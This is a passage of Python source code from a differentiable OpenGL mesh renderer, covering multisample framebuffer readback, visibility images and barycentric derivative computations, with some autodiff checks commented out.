GL.glUniform1f(wwLoc, self.frustum['width'])
GL.glUniform1f(whLoc, self.frustum['height'])
self.renders = np.zeros([self.nsamples, self.frustum['width'], self.frustum['height'],3])
self.renders_sample_pos = np.zeros([self.nsamples, self.frustum['width'], self.frustum['height'],2])
self.renders_faces = np.zeros([self.nsamples, self.frustum['width'], self.frustum['height']]).astype(np.uint32)
self.renders_sample_barycentric1 = np.zeros([self.nsamples, self.frustum['width'], self.frustum['height'], 2])
self.renders_sample_barycentric2 = np.zeros([self.nsamples, self.frustum['width'], self.frustum['height'],1])
self.renders_sample_barycentric = np.zeros([self.nsamples, self.frustum['width'], self.frustum['height'],3])
GL.glDisable(GL.GL_DEPTH_TEST)
GL.glBindFramebuffer(GL.GL_DRAW_FRAMEBUFFER, self.fbo_sample_fetch)
drawingBuffers = [GL.GL_COLOR_ATTACHMENT0, GL.GL_COLOR_ATTACHMENT1, GL.GL_COLOR_ATTACHMENT2, GL.GL_COLOR_ATTACHMENT3,
GL.GL_COLOR_ATTACHMENT4]
GL.glDrawBuffers(5, drawingBuffers)
GL.glClearColor(0., 0., 0., 0.)
GL.glClear(GL.GL_COLOR_BUFFER_BIT | GL.GL_DEPTH_BUFFER_BIT)
for sample in np.arange(self.nsamples):
sampleLoc = GL.glGetUniformLocation(self.fetchSamplesProgram, 'sample')
GL.glUniform1i(sampleLoc, sample)
GL.glActiveTexture(GL.GL_TEXTURE0)
GL.glBindTexture(GL.GL_TEXTURE_2D_MULTISAMPLE, self.texture_errors_render)
GL.glUniform1i(self.colorsLoc, 0)
GL.glActiveTexture(GL.GL_TEXTURE1)
GL.glBindTexture(GL.GL_TEXTURE_2D_MULTISAMPLE, self.texture_errors_sample_position)
GL.glUniform1i(self.sample_positionsLoc, 1)
GL.glActiveTexture(GL.GL_TEXTURE2)
GL.glBindTexture(GL.GL_TEXTURE_2D_MULTISAMPLE, self.texture_errors_sample_faces)
GL.glUniform1i(self.sample_facesLoc, 2)
GL.glActiveTexture(GL.GL_TEXTURE3)
GL.glBindTexture(GL.GL_TEXTURE_2D_MULTISAMPLE, self.texture_errors_sample_barycentric1)
GL.glUniform1i(self.sample_barycentric1Loc, 3)
GL.glActiveTexture(GL.GL_TEXTURE4)
GL.glBindTexture(GL.GL_TEXTURE_2D_MULTISAMPLE, self.texture_errors_sample_barycentric2)
GL.glUniform1i(self.sample_barycentric2Loc, 4)
GL.glBindVertexArray(self.vao_quad)
GL.glDrawArrays(GL.GL_POINTS, 0, 1)
# GL.glBindVertexArray(self.vao_bgCube)
# # self.vbo_f_bgCube.bind()
# GL.glUniformMatrix4fv(self.MVP_texture_location, 1, GL.GL_TRUE, MVP)
#
# GL.glDrawElements(primtype, len(self.vbo_f_bgCube) * self.vbo_f_bgCube.data.shape[1], GL.GL_UNSIGNED_INT, None)
GL.glBindFramebuffer(GL.GL_READ_FRAMEBUFFER, self.fbo_sample_fetch)
GL.glReadBuffer(GL.GL_COLOR_ATTACHMENT0)
result = np.flipud(np.frombuffer(GL.glReadPixels(0, 0, self.frustum['width'], self.frustum['height'], GL.GL_RGB, GL.GL_FLOAT), np.float32).reshape(self.frustum['height'], self.frustum['height'], 3)[:,:,0:3].astype(np.float64))
self.renders[sample] = result
GL.glReadBuffer(GL.GL_COLOR_ATTACHMENT1)
result = np.flipud(np.frombuffer(GL.glReadPixels(0, 0, self.frustum['width'], self.frustum['height'], GL.GL_RGB, GL.GL_FLOAT), np.float32).reshape(self.frustum['height'], self.frustum['height'], 3)[:,:,0:2].astype(np.float64))
self.renders_sample_pos[sample] = result
GL.glReadBuffer(GL.GL_COLOR_ATTACHMENT2)
result = np.flipud(np.frombuffer(GL.glReadPixels(0, 0, self.frustum['width'], self.frustum['height'], GL.GL_RED_INTEGER, GL.GL_UNSIGNED_INT), np.uint32).reshape(self.frustum['height'], self.frustum['height'])[:,:].astype(np.uint32))
self.renders_faces[sample] = result
GL.glReadBuffer(GL.GL_COLOR_ATTACHMENT3)
result = np.flipud(np.frombuffer(GL.glReadPixels(0, 0, self.frustum['width'], self.frustum['height'], GL.GL_RGB, GL.GL_FLOAT), np.float32).reshape(self.frustum['height'], self.frustum['height'], 3)[:,:,0:2].astype(np.float64))
self.renders_sample_barycentric1[sample] = result
GL.glReadBuffer(GL.GL_COLOR_ATTACHMENT4)
result = np.flipud(np.frombuffer(GL.glReadPixels(0, 0, self.frustum['width'], self.frustum['height'], GL.GL_RGB, GL.GL_FLOAT), np.float32).reshape(self.frustum['height'], self.frustum['height'], 3)[:,:,0:1].astype(np.float64))
self.renders_sample_barycentric2[sample] = result
self.renders_sample_barycentric[sample] = np.concatenate([self.renders_sample_barycentric1[sample], self.renders_sample_barycentric2[sample][:,:,0:1]], 2)
# GL.glClear(GL.GL_COLOR_BUFFER_BIT | GL.GL_DEPTH_BUFFER_BIT)
# GL.glReadBuffer(GL.GL_COLOR_ATTACHMENT2)
# result = np.flipud(np.frombuffer(GL.glReadPixels(0, 0, self.frustum['width'], self.frustum['height'], GL.GL_RGB, GL.GL_FLOAT), np.float32).reshape(self.frustum['height'], self.frustum['height'], 3)[:,:,0:3].astype(np.float64))
# self.renders_faces[sample] = result
GL.glBindVertexArray(0)
GL.glClearColor(0.,0.,0., 1.)
GL.glEnable(GL.GL_DEPTH_TEST)
GL.glDisable(GL.GL_MULTISAMPLE)
##Finally return image and derivatives
self.render_resolved = np.mean(self.renders, 0)
self.updateRender = True
self.updateDerivatives_verts = True
self.updateDerivatives_vc = True
def draw_visibility_image_ms(self, v, f):
"""Assumes camera is set up correctly in"""
GL.glUseProgram(self.visibilityProgram_ms)
v = np.asarray(v)
self.draw_visibility_image_ms(v, f)
#Attach FBO
GL.glClear(GL.GL_COLOR_BUFFER_BIT | GL.GL_DEPTH_BUFFER_BIT)
fc = np.arange(1, len(f)+1)
fc = np.tile(fc.reshape((-1,1)), (1, 3))
fc[:, 0] = fc[:, 0] & 255
fc[:, 1] = (fc[:, 1] >> 8 ) & 255
fc[:, 2] = (fc[:, 2] >> 16 ) & 255
fc = np.asarray(fc, dtype=np.uint8)
self.draw_colored_primitives_ms(self.vao_dyn_ub, v, f, fc)
# this assumes that fc is either "by faces" or "verts by face", not "by verts"
def draw_colored_primitives_ms(self, vao, v, f, fc=None):
# gl.EnableClientState(GL_VERTEX_ARRAY)
verts_by_face = np.asarray(v.reshape((-1,3))[f.ravel()], dtype=np.float64, order='C')
# gl.VertexPointer(verts_by_face)
GL.glBindVertexArray(vao)
self.vbo_verts_dyn.set_array(verts_by_face.astype(np.float32))
self.vbo_verts_dyn.bind()
if fc is not None:
# gl.EnableClientState(GL_COLOR_ARRAY)
if fc.size == verts_by_face.size:
vc_by_face = fc
else:
vc_by_face = np.repeat(fc, f.shape[1], axis=0)
if vc_by_face.size != verts_by_face.size:
raise Exception('fc must have either rows=(#rows in faces) or rows=(# elements in faces)')
vc_by_face = np.asarray(vc_by_face, dtype=np.uint8, order='C')
self.vbo_colors_ub.set_array(vc_by_face)
self.vbo_colors_ub.bind()
primtype = GL.GL_TRIANGLES
self.vbo_indices_dyn.set_array(np.arange(f.size, dtype=np.uint32).ravel())
self.vbo_indices_dyn.bind()
GL.glBindFramebuffer(GL.GL_DRAW_FRAMEBUFFER, self.fbo_ms_errors)
drawingBuffers = [GL.GL_COLOR_ATTACHMENT2]
GL.glDrawBuffers(1, drawingBuffers)
view_mtx = self.camera.openglMat.dot(np.asarray(np.vstack((self.camera.view_matrix, np.array([0, 0, 0, 1]))),np.float32))
GL.glUniformMatrix4fv(self.MVP_location, 1, GL.GL_TRUE, np.dot(self.projectionMatrix, view_mtx))
GL.glDisable(GL.GL_DEPTH_TEST)
GL.glDrawElements(primtype, len(self.vbo_indices_dyn), GL.GL_UNSIGNED_INT, None)
GL.glEnable(GL.GL_DEPTH_TEST)
def compute_dr_wrt(self, wrt):
visibility = self.visibility_image
if wrt is self.camera:
derivatives_verts = self.get_derivatives_verts()
return derivatives_verts
elif wrt is self.vc:
derivatives_vc = self.get_derivatives_vc()
return derivatives_vc
# Not working atm.:
elif wrt is self.bgcolor:
return 2. * (self.imageGT.r - self.render_image).ravel() * common.dr_wrt_bgcolor(visibility, self.frustum, num_channels=self.num_channels)
#Not working atm.:
elif wrt is self.texture_stack:
IS = np.nonzero(self.visibility_image.ravel() != 4294967295)[0]
texcoords, texidx = self.texcoord_image_quantized
vis_texidx = texidx.ravel()[IS]
vis_texcoords = texcoords.ravel()[IS]
JS = vis_texcoords * np.tile(col(vis_texidx), [1,2]).ravel()
clr_im = -2. * (self.imageGT.r - self.render_image) * self.renderWithoutTexture
if False:
cv2.imshow('clr_im', clr_im)
# cv2.imshow('texmap', self.texture_image.r)
cv2.waitKey(1)
r = clr_im[:,:,0].ravel()[IS]
g = clr_im[:,:,1].ravel()[IS]
b = clr_im[:,:,2].ravel()[IS]
data = np.concatenate((r,g,b))
IS = np.concatenate((IS*3, IS*3+1, IS*3+2))
JS = np.concatenate((JS*3, JS*3+1, JS*3+2))
return sp.csc_matrix((data, (IS, JS)), shape=(self.r.size, wrt.r.size))
return None
def compute_r(self):
return self.render()
@depends_on(dterms+terms)
def renderWithoutColor(self):
self._call_on_changed()
return self.render_nocolor
@depends_on(dterms+terms)
def renderWithoutTexture(self):
self._call_on_changed()
return self.render_notexture
# @depends_on(dterms+terms)
def render(self):
self._call_on_changed()
visibility = self.visibility_image
color = self.render_resolved
visible = np.nonzero(visibility.ravel() != 4294967295)[0]
barycentric = self.barycentric_image
if self.updateRender:
render = self.compute_image(visible, visibility, self.f)
self.render_result = render
self.updateRender = False
return self.render_result
def get_derivatives_verts(self):
self._call_on_changed()
visibility = self.visibility_image
color = self.render_resolved
visible = np.nonzero(visibility.ravel() != 4294967295)[0]
barycentric = self.barycentric_image
if self.updateDerivatives_verts:
if self.updateRender:
self.render()
if self.overdraw:
# return common.dImage_wrt_2dVerts_bnd(color, visible, visibility, barycentric, self.frustum['width'], self.frustum['height'], self.v.r.size/3, self.f, self.boundaryid_image != 4294967295)
derivatives_verts = common.dImage_wrt_2dVerts_bnd(color, visible, visibility, barycentric, self.frustum['width'], self.frustum['height'], self.v.r.size/3, self.f, self.boundaryid_image != 4294967295)
else:
derivatives_verts = common.dImage_wrt_2dVerts(color, visible, visibility, barycentric, self.frustum['width'], self.frustum['height'], self.v.r.size/3, self.f)
self.derivatives_verts = derivatives_verts
self.updateDerivatives_verts = False
return self.derivatives_verts
def get_derivatives_vc(self):
self._call_on_changed()
visibility = self.visibility_image
color = self.render_resolved
visible = np.nonzero(visibility.ravel() != 4294967295)[0]
barycentric = self.barycentric_image
if self.updateDerivatives_vc:
if self.updateRender:
self.render()
derivatives_vc = self.compute_derivatives_vc(color, visible, visibility, barycentric, self.frustum['width'], self.frustum['height'], self.v.r.size / 3, self.f)
self.derivatives_vc = derivatives_vc
self.updateDerivatives_vc = False
return self.derivatives_vc
# # @depends_on(dterms+terms)
# def image_and_derivatives(self):
# # self._call_on_changed()
# visibility = self.visibility_image
#
# color = self.render_resolved
#
# visible = np.nonzero(visibility.ravel() != 4294967295)[0]
# num_visible = len(visible)
#
# barycentric = self.barycentric_image
#
# if self.updateRender:
# render, derivatives = self.compute_image_and_derivatives(color, visible, visibility, barycentric, self.frustum['width'], self.frustum['height'], self.v.r.size / 3, self.f)
# self.render = render
# self.derivatives = derivatives
# self.updateRender = False
#
# return self.render, self.derivatives
#
def barycentricDerivatives(self, vertices, faces, verts):
import chumpy as ch
vertices = np.concatenate([vertices, np.ones([vertices.size // 3, 1])], axis=1)
view_mtx = np.r_[self.camera.view_mtx, np.array([[0, 0, 0, 1]])]
camMtx = np.r_[np.c_[self.camera.camera_mtx, np.array([0, 0, 0])], np.array([[0, 0, 0, 1]])]
verts_hom = np.concatenate([verts.reshape([-1, 3]), np.ones([verts.size // 3, 1])], axis=1)
# viewVerts = negYMat.dot(view_mtx.dot(verts_hom.T).T[:, :3].T).T.reshape([-1, 3])
projVerts = (camMtx.dot(view_mtx)).dot(verts_hom.T).T[:, :3].reshape([-1, 3])
viewVerticesNonBnd = camMtx[0:3, 0:3].dot(view_mtx.dot(vertices.T).T[:, :3].T).T.reshape([-1, 3, 3])
# # Check with autodiff:
#
# view_mtx = np.r_[self.camera.view_mtx, np.array([[0, 0, 0, 1]])]
# # negYMat = ch.array([[1,0,self.camera.c.r[0]],[0,-1,self.camera.c.r[1]],[0,0,1]])
# verts_hom_ch = ch.Ch(verts_hom)
# camMtx = ch.Ch(np.r_[np.c_[self.camera.camera_mtx, np.array([0, 0, 0])], np.array([[0, 0, 0, 1]])])
# projVerts = (camMtx.dot(view_mtx)).dot(verts_hom_ch.T).T[:, :3].reshape([-1, 3])
# viewVerts = ch.Ch(np.array(projVerts))
# projVerts = projVerts[:, :2] / projVerts[:, 2:3]
#
# chViewVerticesNonBnd = camMtx[0:3, 0:3].dot(view_mtx.dot(vertices.T).T[:, :3].T).T.reshape([-1, 3, 3])
# p0 = ch.Ch(viewVerticesNonBnd[:, 0, :])
# chp0 = p0
#
# p1 = ch.Ch(viewVerticesNonBnd[:, 1, :])
# chp1 = p1
#
# p2 = ch.Ch(viewVerticesNonBnd[:, 2, :])
# chp2 = p2
#
# # D = np.linalg.det(np.concatenate([(p3 - p1).reshape([nNonBndFaces, 1, 3]), (p1 - p2).reshape([nNonBndFaces, 1, 3])], axis=1))
# nt = ch.cross(p1 - p0, p2 - p0)
# chnt = nt
# A = 0.5 * ch.sqrt(ch.sum(nt ** 2, axis=1))
# chnt_norm = nt / ch.sqrt(ch.sum(nt ** 2, axis=1))[:, None]
# # nt = nt / A
#
# chb0part2 = ch.sum(ch.cross(chnt_norm, p2 - p1) * (viewVerts - p1), axis=1)
# chb0 = 0.5 * ch.sum(ch.cross(chnt_norm, p2 - p1) * (viewVerts - p1), axis=1) / A
# chb1part2 = ch.sum(ch.cross(chnt_norm, p0 - p2) * (viewVerts - p2), axis=1)
# chb1 = 0.5 * ch.sum(ch.cross(chnt_norm, p0 - p2) * (viewVerts - p2), axis=1) / A
# chb2part2 = ch.sum(ch.cross(chnt_norm, p1 - p0) * (viewVerts - p0), axis=1)
# chb2 = 0.5 * ch.sum(ch.cross(chnt_norm, p1 - p0) * (viewVerts - p0), axis=1) / A
#
# drb0p0 = chb0.dr_wrt(p0)
# drb0p1 = chb0.dr_wrt(p1)
# drb0p2 = chb0.dr_wrt(p2)
#
# drb1p0 = chb1.dr_wrt(p0)
# drb1p1 = chb1.dr_wrt(p1)
# drb1p2 = chb1.dr_wrt(p2)
#
# drb2p0 = chb2.dr_wrt(p0)
# drb2p1 = chb2.dr_wrt(p1)
# drb2p2 = chb2.dr_wrt(p2)
#
# rows = np.tile(np.arange(drb0p0.shape[0])[None, :], [3, 1]).T.ravel()
# cols = np.arange(drb0p0.shape[0] * 3)
#
# drb0p0 = np.array(drb0p0[rows, cols]).reshape([-1, 3])
# drb0p1 = np.array(drb0p1[rows, cols]).reshape([-1, 3])
# drb0p2 = np.array(drb0p2[rows, cols]).reshape([-1, 3])
# drb1p0 = np.array(drb1p0[rows, cols]).reshape([-1, 3])
# drb1p1 = np.array(drb1p1[rows, cols]).reshape([-1, 3])
# drb1p2 = np.array(drb1p2[rows, cols]).reshape([-1, 3])
# drb2p0 = np.array(drb2p0[rows, cols]).reshape([-1, 3])
# drb2p1 = np.array(drb2p1[rows, cols]).reshape([-1, 3])
# drb2p2 = np.array(drb2p2[rows, cols]).reshape([-1, 3])
#
# chdp0 = np.concatenate([drb0p0[:, None, :], drb1p0[:, None, :], drb2p0[:, None, :]], axis=1)
# chdp1 = np.concatenate([drb0p1[:, None, :], drb1p1[:, None, :], drb2p1[:, None, :]], axis=1)
# chdp2 = np.concatenate([drb0p2[:, None, :], drb1p2[:, None, :], drb2p2[:, None, :]], axis=1)
# #
# # dp = np.concatenate([dp0[:, :, None], dp1[:, :, None], dp2[:, :, None]], 2)
# # dp = dp[None, :]
view_mtx = np.r_[self.camera.view_mtx, np.array([[0, 0, 0, 1]])]
camMtx = np.r_[np.c_[self.camera.camera_mtx, np.array([0, 0, 0])], np.array([[0, 0, 0, 1]])]
verts_hom = np.concatenate([verts.reshape([-1, 3]), np.ones([verts.size // 3, 1])], axis=1)
# viewVerts = negYMat.dot(view_mtx.dot(verts_hom.T).T[:, :3].T).T.reshape([-1, 3])
projVerts = (camMtx.dot(view_mtx)).dot(verts_hom.T).T[:, :3].reshape([-1, 3])
viewVerts = projVerts
projVerts = projVerts[:, :2] / projVerts[:, 2:3]
# viewVerticesNonBnd = negYMat.dot(view_mtx.dot(vertices.T).T[:, :3].T).T.reshape([-1, 3, 3])
p0 = viewVerticesNonBnd[:, 0, :]
p1 = viewVerticesNonBnd[:, 1, :]
p2 = viewVerticesNonBnd[:, 2, :]
p0_proj = p0[:,0:2]/p0[:,2:3]
p1_proj = p1[:,0:2]/p1[:,2:3]
p2_proj = p2[:,0:2]/p2[:,2:3]
# D = np.linalg.det(np.concatenate([(p3 - p1).reshape([nNonBndFaces, 1, 3]), (p1 - p2).reshape([nNonBndFaces, 1, 3])], axis=1))
nt = np.cross(p1 - p0, p2 - p0)
nt_norm = nt / np.linalg.norm(nt, axis=1)[:, None]
# a = -nt_norm[:, 0] / nt_norm[:, 2]
# b = -nt_norm[:, 1] / nt_norm[:, 2]
# c = np.sum(nt_norm * p0, 1) / nt_norm[:, 2]
cam_f = 1
u = p0[:, 0]/p0[:, 2]
v = p0[:, 1]/p0[:, 2]
# xudiv = (cam_f - a * u - b * v) ** 2
# xu = np.c_[c * (cam_f - b * v) / xudiv, a * v * c / xudiv, a * cam_f * c / xudiv]
# xv = np.c_[b * u * c / xudiv, c * (cam_f - a * u) / xudiv, b * cam_f * c / xudiv]
xu = np.c_[p0[:, 2][:,None], np.zeros([len(p0),1]), (-p0[:,0]/u**2)[:,None]]
xv = np.c_[np.zeros([len(p0),1]), p0[:, 2][:,None], (-p0[:,1]/v**2)[:,None]]
dxdp_0 = np.concatenate([xu[:, :, None], xv[:, :, None]], axis=2)
u = p1[:, 0]/p1[:, 2]
v = p1[:, 1]/p1[:, 2]
# xudiv = (cam_f - a * u - b * v) ** 2
# xu = np.c_[c * (cam_f - b * v) / xudiv, a * v * c / xudiv, a * cam_f * c / xudiv]
# xv = np.c_[b * u * c / xudiv, c * (cam_f - a * u) / xudiv, b * cam_f * c / xudiv]
xu = np.c_[p1[:, 2][:,None], np.zeros([len(p1),1]), (-p1[:,0]/u**2)[:,None]]
xv = np.c_[np.zeros([len(p1),1]), p1[:, 2][:,None], (-p1[:,1]/v**2)[:,None]]
dxdp_1 = np.concatenate([xu[:, :, None], xv[:, :, None]], axis=2)
u = p2[:, 0]/p2[:, 2]
v = p2[:, 1]/p2[:, 2]
# xudiv = (cam_f - a * u - b * v) ** 2
# xu = np.c_[c * (cam_f - b * v) / xudiv, a * v * c / xudiv, a * cam_f * c / xudiv]
# xv = np.c_[b * u * c / xudiv, c * (cam_f - a * u) / xudiv, b * cam_f * c / xudiv]
xu = np.c_[p2[:, 2][:,None], np.zeros([len(p2),1]), (-p2[:,0]/u**2)[:,None]]
xv = np.c_[np.zeros([len(p2),1]), p2[:, 2][:,None], (-p2[:,1]/v**2)[:,None]]
dxdp_2 = np.concatenate([xu[:, :, None], xv[:, :, None]], axis=2)
# x = u * c / (cam_f - a * u - b * v)
# y = v*c/(cam_f - a*u - b*v)
# z = c*cam_f/(cam_f - a*u - b*v)
A = 0.5*np.linalg.norm(np.cross(p1 - p0, p2 - p0),axis=1)
nt_mag = A*2
# nt = nt / A
# db1 = 0.5*np.cross(nt_norm, p2-p1)/A[:, None]
# db2 = 0.5*np.cross(nt_norm, p0-p2)/A[:, None]
# db3_2 = 0.5*np.cross(nt_norm, p1-p0)/A[:, None]
# db3 = - db1 - db2
p = viewVerts
pre1 = -1/(nt_mag[:,None]**2) * nt_norm
ident = np.identity(3)
ident = np.tile(ident[None,:],[len(p2),1,1])
dntdp0 = np.cross((p2-p0)[:,None,:], -ident) + np.cross(-ident, (p1-p0)[:,None,:])
dntdp1 = np.cross((p2-p0)[:,None,:],ident)
dntdp2 = np.cross(ident,(p1-p0)[:,None,:])
#Pol check this!:
dntnorm = (ident - np.einsum('ij,ik->ijk',nt_norm,nt_norm))/nt_mag[:,None,None]
# dntnorm = (ident - np.einsum('ij,ik->ijk',nt_norm,nt_norm))/nt_mag[:,None,None]
dntnormdp0 = np.einsum('ijk,ikl->ijl',dntnorm, dntdp0)
dntnormdp1 = np.einsum('ijk,ikl->ijl',dntnorm, dntdp1)
dntnormdp2 = np.einsum('ijk,ikl->ijl',dntnorm, dntdp2)
dpart1p0 = np.einsum('ij,ijk->ik', pre1, dntdp0)
dpart1p1 = np.einsum('ij,ijk->ik', pre1, dntdp1)
dpart1p2 = np.einsum('ij,ijk->ik', pre1, dntdp2)
b0 = np.sum(np.cross(nt_norm, p2 - p1) * (p - p1), axis=1)[:,None]
db0part2p0 = np.einsum('ikj,ij->ik',np.cross(dntnormdp0.swapaxes(1,2), (p2 - p1)[:, None, :]), p - p1)
# db0part2p1 = np.einsum('ikj,ij->ik',np.cross((p2 - p1)[:, None, :], dntnormdp0), p - p1) + np.einsum('ikj,ij->ik', np.cross(-ident,nt_norm[:, None, :]), p - p1) + np.einsum('ik,ikj->ik', np.cross(nt_norm[:, :], p2-p1),-ident)
# db0part2p1 = np.einsum('ikj,ij->ik',np.cross((p2 - p1)[:, None, :], dntnormdp0.swapaxes(1,2)), p - p1) + np.einsum('ikj,ij->ik', np.cross(-ident, nt_norm[:, None, :]), p - p1) + np.einsum('ik,ikj->ik', np.cross(p2-p1,nt_norm[:, :]),-ident)
db0part2p1 = np.einsum('ikj,ij->ik',np.cross(dntnormdp1.swapaxes(1,2), (p2 - p1)[:, None, :]), p - p1) + np.einsum('ikj,ij->ik', np.cross(nt_norm[:, None, :],-ident), p - p1) + np.einsum('ik,ikj->ik', np.cross(nt_norm[:, :], p2-p1), -ident)
db0part2p2 = np.einsum('ikj,ij->ik',np.cross(dntnormdp2.swapaxes(1,2), (p2 - p1)[:, None, :]), p - p1) + np.einsum('ikj,ij->ik', np.cross(nt_norm[:, None, :], ident), p - p1)
db0dp0wrtpart1 = dpart1p0*b0
db0dp1wrtpart1 = dpart1p1*b0
db0dp2wrtpart1 = dpart1p2*b0
db0dp0wrtpart2 = 1./(nt_mag[:,None])*db0part2p0
db0dp1wrtpart2 = 1./(nt_mag[:,None])*db0part2p1
db0dp2wrtpart2 = 1./(nt_mag[:,None])*db0part2p2
db0dp0wrt = db0dp0wrtpart1 + db0dp0wrtpart2
db0dp1wrt = db0dp1wrtpart1 + db0dp1wrtpart2
db0dp2wrt = db0dp2wrtpart1 + db0dp2wrtpart2
######
b1 = np.sum(np.cross(nt_norm, p0 - p2) * (p - p2), axis=1)[:, None]
db1part2p0 = np.einsum('ikj,ij->ik',np.cross(dntnormdp0.swapaxes(1, 2),(p0 - p2)[:, None, :]), p - p2) + np.einsum('ikj,ij->ik', np.cross(nt_norm[:, None, :], ident), p - p2)
db1part2p1 = np.einsum('ikj,ij->ik',np.cross(dntnormdp1.swapaxes(1, 2),(p0 - p2)[:, None, :]), p - p2)
db1part2p2 = np.einsum('ikj,ij->ik',np.cross(dntnormdp2.swapaxes(1, 2),(p0 - p2)[:, None, :]), p - p2) + np.einsum('ikj,ij->ik', np.cross(nt_norm[:, None, :], -ident), p - p2) + np.einsum('ik,ikj->ik', np.cross(nt_norm[:, :], p0-p2), -ident)
db1dp0wrtpart1 = dpart1p0*b1
db1dp1wrtpart1 = dpart1p1*b1
db1dp2wrtpart1 = dpart1p2*b1
db1dp0wrtpart2 = 1./(nt_mag[:,None])*db1part2p0
db1dp1wrtpart2 = 1./(nt_mag[:,None])*db1part2p1
db1dp2wrtpart2 = 1./(nt_mag[:,None])*db1part2p2
db1dp0wrt = db1dp0wrtpart1 + db1dp0wrtpart2
db1dp1wrt = db1dp1wrtpart1 + db1dp1wrtpart2
db1dp2wrt = db1dp2wrtpart1 + db1dp2wrtpart2
######
b2 = np.sum(np.cross(nt_norm, p1 - p0) * (p - p0), axis=1)[:, None]
db2part2p0 = np.einsum('ikj,ij->ik',np.cross(dntnormdp0.swapaxes(1, 2),(p1 - p0)[:, None, :]), p - p0) + np.einsum('ikj,ij->ik', np.cross(nt_norm[:, None, :], -ident), p - p0) + np.einsum('ik,ikj->ik', np.cross(nt_norm[:, :], p1 - p0), -ident)
db2part2p1 = np.einsum('ikj,ij->ik',np.cross(dntnormdp1.swapaxes(1, 2),(p1 - p0)[:, None, :]), p - p0) + np.einsum('ikj,ij->ik', np.cross(nt_norm[:, None, :], ident), p - p0)
db2part2p2 = np.einsum('ikj,ij->ik',np.cross(dntnormdp2.swapaxes(1, 2), (p1 - p0)[:, None, :]), p - p0)
db2dp0wrtpart1 = dpart1p0*b2
db2dp1wrtpart1 = dpart1p1*b2
db2dp2wrtpart1 = dpart1p2*b2
db2dp0wrtpart2 = 1./(nt_mag[:,None])*db2part2p0
db2dp1wrtpart2 = 1./(nt_mag[:,None])*db2part2p1
db2dp2wrtpart2 = 1./(nt_mag[:,None])*db2part2p2
db2dp0wrt = db2dp0wrtpart1 + db2dp0wrtpart2
db2dp1wrt = db2dp1wrtpart1 + db2dp1wrtpart2
db2dp2wrt = db2dp2wrtpart1 + db2dp2wrtpart2
dp0 = np.concatenate([db0dp0wrt[:, None, :], db1dp0wrt[:, None, :], db2dp0wrt[:, None, :]], axis=1)
dp1 = np.concatenate([db0dp1wrt[:, None, :], db1dp1wrt[:, None, :], db2dp1wrt[:, None, :]], axis=1)
dp2 = np.concatenate([db0dp2wrt[:, None, :], db1dp2wrt[:, None, :], db2dp2wrt[:, None, :]], axis=1)
#
dp = np.concatenate([dp0[:, :, None], dp1[:, :, None], dp2[:, :, None]], 2)
#If dealing with degenerate triangles, ignore that gradient.
# dp[nt_mag<=1e-15] = 0
dp = dp[None, :]
nFaces = len(faces)
# visTriVC = self.vc.r[faces.ravel()].reshape([nFaces, 3, 3]).transpose([2, 0, 1])[:, :, :, None, None]
vc = self.vc.r[faces.ravel()].reshape([nFaces, 3, 3]).transpose([2, 0, 1])[:, :, :, None, None]
vc[vc > 1] = 1
vc[vc < 0] = 0
visTriVC = vc
dxdp = np.concatenate([dxdp_0[:,None,:],dxdp_1[:,None,:],dxdp_2[:,None,:]], axis=1)
dxdp = dxdp[None, :, None]
# dbvc = np.sum(dp * visTriVC, 2)
# dbvc = dp * visTriVC * t_area[None, :, None, None, None]
dbvc = dp * visTriVC
didp = np.sum(dbvc[:, :, :, :, :, None] * dxdp, 4).sum(2)
#output should be shape: VC x Ninput x Tri Points x UV
# drb0p0 # db0dp0wrt
# drb0p1 # db0dp1wrt
# drb0p2 # db0dp2wrt
# drb1p0 # db1dp0wrt
# drb1p1 # db1dp1wrt
# drb1p2 # db1dp2wrt
# drb2p0 # db2dp0wrt
# drb2p1 # db2dp1wrt
# drb2p2 # db2dp2wrt
#
return didp
def compute_image(self, visible, visibility, f):
"""Construct a sparse jacobian that relates 2D projected vertex positions
(in the columns) to pixel values (in the rows). This can be done
in two steps."""
width = self.frustum['width']
height = self.frustum['height']
num_channels = 3
n_channels = num_channels
vc_size = self.vc.size
# xdiff = dEdx
# ydiff = dEdy
# projVertices = self.camera.r[f[visibility.ravel()[visible]].ravel()].reshape([nVisF,3, 2])
boundaryImage = self.boundarybool_image.astype(np.bool) & (visibility != 4294967295)
rangeIm = np.arange(self.boundarybool_image.size)
zerosIm = np.ones(self.boundarybool_image.shape).astype(np.bool)
edge_visibility = self.boundaryid_image
nsamples = self.nsamples
if np.any(boundaryImage):
boundaryFaces = visibility[(boundaryImage) & (visibility != 4294967295)]
nBndFaces = len(boundaryFaces)
projFacesBndTiled = np.tile(boundaryFaces[None, :], [self.nsamples, 1])
sampleFaces = self.renders_faces.reshape([nsamples, -1])[:, (zerosIm * boundaryImage).ravel().astype(np.bool)].reshape([nsamples, -1]) - 1
edgeFaces= np.tile(self.fpe[edge_visibility.ravel()[(zerosIm * boundaryImage).ravel().astype(np.bool)]][None, :, :], [8, 1, 1])
edgeSampled = np.any((edgeFaces[:,:, 0]== sampleFaces) | (edgeFaces[:,:, 1]== sampleFaces),0)
facesInsideBnd = projFacesBndTiled == sampleFaces
wrongBnd = ~edgeSampled
# wrongBnd = np.all(facesInsideBnd, 0)
whereBnd = np.where(boundaryImage.ravel())[0]
# boundaryImage.ravel()[whereBnd[wrongBnd]] = False
if np.any(boundaryImage):
sampleV = self.renders_sample_pos.reshape([nsamples, -1, 2])[:, (zerosIm * boundaryImage).ravel().astype(np.bool), :].reshape([nsamples, -1, 2])
# sampleBarycentric = self.renders_sample_barycentric.reshape([nsamples, -1, 3])[:,(zerosIm*boundaryImage).ravel().astype(np.bool),:].reshape([nsamples, -1, 3])
sampleColors = self.renders.reshape([nsamples, -1, 3])[:, (zerosIm * boundaryImage).ravel().astype(np.bool), :].reshape([nsamples, -1, 3])
boundaryFaces = visibility[(boundaryImage)&(visibility !=4294967295 )]
nBndFaces = len(boundaryFaces)
projFacesBndTiled = np.tile(boundaryFaces[None, :], [self.nsamples, 1])
facesInsideBnd = projFacesBndTiled == sampleFaces
facesOutsideBnd = ~facesInsideBnd
vertsProjBnd = self.camera.r[self.vpe[edge_visibility.ravel()[(zerosIm * boundaryImage).ravel().astype(np.bool)]].ravel()].reshape([-1, 2, 2])
vertsProjBndSamples = np.tile(vertsProjBnd[None, :], [self.nsamples, 1,1,1])
vertsProjBndSamplesOutside = vertsProjBndSamples[facesOutsideBnd]
frontFacing = self.frontFacingEdgeFaces[(zerosIm * boundaryImage).ravel().astype(np.bool)].astype(np.bool)
